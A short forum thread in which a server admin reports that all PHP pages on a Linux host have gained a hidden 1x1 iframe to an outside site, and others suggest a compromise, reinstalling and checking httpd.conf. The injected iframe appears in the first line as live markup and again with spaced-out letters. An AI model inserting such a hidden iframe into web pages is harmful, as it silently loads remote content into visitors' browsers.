<IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH=1 HEIGHT=1></IFRAME>
I'm running a linux server hosting a few small sites.
Just a short time ago, all php sourcecodes sent out from the server include the line
at the end.
<IFRAME SRC="h t t p : / / w w w . f o r c e d - a c t i o n . c o m/?d=get" WIDTH=1 HEIGHT=1></IFRAME>
I guess someone hacked the machine and installed a process or took similar action.
Can anyone help me? I'm stuck on it...
I'm just curious, what's your website?
Alright, just checking.

yeah after posting i saw it could be understood as spam :]
I experienced this on a server. I haven't been able to find out just how much the server was compromised but I had to tell all website owners to upload their offline version to get rid of the code.
I then moved them to a new server and reinstalled the old one.
first, the iframe was inside the files on the server, but after removing the tag from the files, it seemed to insert it somewhere on the way from the harddisk to the client.
Check in your httpd.conf for it being added in there
